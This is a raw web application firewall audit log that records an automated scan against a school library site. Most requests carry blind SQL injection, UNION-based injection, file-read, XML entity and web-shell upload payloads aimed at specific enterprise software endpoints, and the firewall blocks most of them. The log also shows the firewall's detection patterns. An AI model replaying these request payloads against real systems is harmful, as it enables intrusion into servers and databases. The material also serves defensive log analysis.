Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept: */* SOAPAction: http://tempuri.org/GetHomeInfo Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 163086402 --e744cc17-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e744cc17-E-- --e744cc17-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.FormulaViewAction&method=execute&repID=1')%20WAITFOR%20DELAY%20'0:0:3'--+&unitID=public"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243398182 3333 (- - -) Stopwatch2: 1747873243398182 3333; combined=1740, p1=334, p2=1382, p3=0, p4=0, p5=24, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e744cc17-Z-- --b405997f-A-- [22/May/2025:07:20:43 +0700] aC5t230O04WKE1HJ5iT-xQAAAAw 103.236.140.4 34034 103.236.140.4 8181 --b405997f-B-- GET /portal/pt/PaWfm/open?pageId=login&proDefPk=11';waitfor+delay+'0:0:6'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:137.0) Gecko/20100101 Firefox/137.0 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 163020821 --b405997f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b405997f-E-- --b405997f-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/PaWfm/open?pageId=login&proDefPk=11';waitfor+delay+'0:0:6'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243400362 2416 (- - -) Stopwatch2: 1747873243400362 2416; combined=1382, p1=356, p2=989, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b405997f-Z-- --a1a0107e-A-- [22/May/2025:07:20:43 +0700] aC5t2yektx75wRFPQyh-_QAAAMs 103.236.140.4 34038 103.236.140.4 8181 --a1a0107e-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:3%27--+ HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/json Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 162988062 --a1a0107e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a1a0107e-E-- --a1a0107e-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:3%27--+"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243401336 2554 (- - -) Stopwatch2: 1747873243401336 2554; combined=1616, p1=315, p2=1273, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1a0107e-Z-- --4e77ec67-A-- [22/May/2025:07:20:43 +0700] aC5t2-ThJmFSRJ5-OZdYzQAAAEg 103.236.140.4 34046 103.236.140.4 8181 --4e77ec67-B-- POST /u9/OnLine/UMWebService.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 371 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/GetLogContent" X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 165937164 --4e77ec67-C-- ../web.config --4e77ec67-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e77ec67-H-- Message: Access denied with code 403 (phase 2). Matched phrase "Web.config" at XML. 
[file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: Web.config found within XML: web.config\x0a \x0a \x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243401050 3254 (- - -) Stopwatch2: 1747873243401050 3254; combined=2136, p1=387, p2=1724, p3=0, p4=0, p5=25, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e77ec67-Z-- --319a653c-A-- [22/May/2025:07:20:44 +0700] aC5t3GfriXjg62qQwE_ldwAAAJA 103.236.140.4 34062 103.236.140.4 8181 --319a653c-B-- POST /service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 104 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 159417174 --319a653c-C-- {"reportType":"1';waitfor delay '0:0:3'-- ","pageInfo":{"currentPageIndex":1,"pageSize":1},"keyword":[]} --319a653c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --319a653c-E-- --319a653c-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244040635 3307 (- - -) Stopwatch2: 1747873244040635 3307; combined=1830, p1=467, p2=1332, p3=0, p4=0, p5=30, sr=81, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --319a653c-Z-- --83b90459-A-- [22/May/2025:07:20:44 +0700] aC5t3Cektx75wRFPQyh-_wAAAMg 103.236.140.4 34038 103.236.140.4 8181 --83b90459-B-- GET /u8qx/slbmbygr.jsp?gsdm=1';waitfor+delay+'0:0:3'--&zydm&kjnd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=34DCA648490CB73AC7CD8ED3738BC883 X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 159417177 --83b90459-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --83b90459-E-- --83b90459-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /u8qx/slbmbygr.jsp?gsdm=1';waitfor+delay+'0:0:3'--&zydm&kjnd"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244044992 3241 (- - -) Stopwatch2: 1747873244044992 3241; combined=1889, p1=460, p2=1401, p3=0, p4=0, p5=28, sr=134, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83b90459-Z-- --915ae502-A-- [22/May/2025:07:20:44 +0700] aC5t3OThJmFSRJ5-OZdYzwAAAEs 103.236.140.4 34092 103.236.140.4 8181 --915ae502-B-- POST /ufgovbank HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 157 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 163020824 --915ae502-C-- reqData= &signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest --915ae502-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --915ae502-E-- --915ae502-H-- Message: Access denied with code 403 (phase 2). Pattern match "<\\!(doctype|entity)" at ARGS:reqData. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "92"] [id "212860"] [rev "4"] [msg "COMODO WAF: XSS Attack Detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: \x0d\x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244046428 2446 (- - -) Stopwatch2: 1747873244046428 2446; combined=1341, p1=267, p2=1051, p3=0, p4=0, p5=22, sr=53, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --915ae502-Z-- --a9221a74-A-- [22/May/2025:07:20:44 +0700] aC5t3OThJmFSRJ5-OZdYzgAAAEw 103.236.140.4 34090 103.236.140.4 8181 --a9221a74-B-- GET /linksframe/linkadd.jsp?id=666666%27+union+all+select+null%2Cnull%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%27123456%27%29%29%2Cnull%2Cnull%2C%27 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168369730 --a9221a74-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a9221a74-E-- --a9221a74-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 666666' union all select null,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),null,null,' found within MATCHED_VAR: 666666' union all select null,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),null,null,'"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244046323 2879 (- - -) Stopwatch2: 1747873244046323 2879; combined=1616, p1=353, p2=1232, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9221a74-Z-- --13e7454e-A-- [22/May/2025:07:20:44 +0700] aC5t3Cektx75wRFPQyh_AAAAAMw 103.236.140.4 34058 103.236.140.4 8181 --13e7454e-B-- POST /services/operOriztion HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 517 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: text/xml;charset=UTF-8 SOAPAction: "" X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 160793107 --13e7454e-C-- ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))-- --13e7454e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13e7454e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! 
?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')) found within MATCHED_VAR: ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244045973 4098 (- - -) Stopwatch2: 1747873244045973 4098; combined=3019, p1=472, p2=2520, p3=0, p4=0, p5=26, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13e7454e-Z-- --85022b18-A-- [22/May/2025:07:20:44 +0700] aC5t3Cektx75wRFPQyh_AgAAAM8 103.236.140.4 34096 103.236.140.4 8181 --85022b18-B-- POST /mp/login/../uploadControl/uploadFile HTTP/1.0 Host: 218.95.66.214 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 218.95.66.214 X-Forwarded-Server: 218.95.66.214 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close Content-Length: 303 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDIsCqVMmF83ptmp --85022b18-C-- ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="file"; filename="test.jsp" Content-Type: application/octet-stream bpkzoklykx ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundaryoDIsCqVMmF83ptmp --85022b18-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --85022b18-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||218.95.66.214|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747873244046544 3747 (- - -) Stopwatch2: 1747873244046544 3747; combined=2461, p1=427, p2=1959, p3=24, p4=27, p5=24, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85022b18-Z-- --232e1c2e-A-- [22/May/2025:07:20:44 +0700] aC5t3OThJmFSRJ5-OZdY0AAAAEc 103.236.140.4 34102 103.236.140.4 8181 --232e1c2e-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method&repID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 166330401 --232e1c2e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --232e1c2e-E-- --232e1c2e-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method&repID=1%27);WAITFOR+DELAY+%270:0:6%27--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244047997 2750 (- - -) Stopwatch2: 1747873244047997 2750; combined=1518, p1=402, p2=1087, p3=0, p4=0, p5=28, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --232e1c2e-Z-- --e8432462-A-- [22/May/2025:07:20:44 +0700] aC5t3OThJmFSRJ5-OZdY0wAAAE4 103.236.140.4 34102 103.236.140.4 8181 --e8432462-B-- POST /KT_Admin/CarCard/DoubtCarNoListFrom.aspx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 41 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 168117890 --e8432462-C-- start=0&limit=20&filer=1;SELECT SLEEP(1)# --e8432462-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8432462-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:; ?(?:(?:(?:trunc|cre|upd)at|renam)e|(?:inser|selec)t|de(?:lete|sc)|alter|load) ?[\\[(]?\\b\\w{2,}|\\bcreate function .+ returns\\b))" at ARGS:filer. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "63"] [id "211820"] [rev "4"] [msg "COMODO WAF: Detects MySQL UDF injection and other data/structure manipulation attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: ;SELECT SLEEP found within ARGS:filer: 1;SELECT SLEEP(1)"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244058133 2981 (- - -) Stopwatch2: 1747873244058133 2981; combined=1721, p1=450, p2=1244, p3=0, p4=0, p5=26, sr=147, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8432462-Z-- --5c802e58-A-- [22/May/2025:07:20:44 +0700] aC5t3GfriXjg62qQwE_leAAAAI8 103.236.140.4 34116 103.236.140.4 8181 --5c802e58-B-- GET /u8qx/obr_zdybxd_check.jsp?mlid=1';waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=34DCA648490CB73AC7CD8ED3738BC883 X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 162988071 --5c802e58-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5c802e58-E-- --5c802e58-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /u8qx/obr_zdybxd_check.jsp?mlid=1';waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873244063308 2524 (- - -) Stopwatch2: 1747873244063308 2524; combined=1383, p1=340, p2=1017, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c802e58-Z-- --c3e19d36-A-- [22/May/2025:07:20:45 +0700] aC5t3eThJmFSRJ5-OZdY1AAAAFI 103.236.140.4 34118 103.236.140.4 8181 --c3e19d36-B-- POST /ncchr/attendScript/internal/runScript HTTP/1.0 Host: 127.0.0.1 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 127.0.0.1 X-Forwarded-Server: 127.0.0.1 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close Content-Length: 59 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 Accept: */* Accept-Language: en Authorization: 58e00466213416018d01d15de83b0198 Content-Type: application/x-www-form-urlencoded --c3e19d36-C-- key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual --c3e19d36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3e19d36-E-- --c3e19d36-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
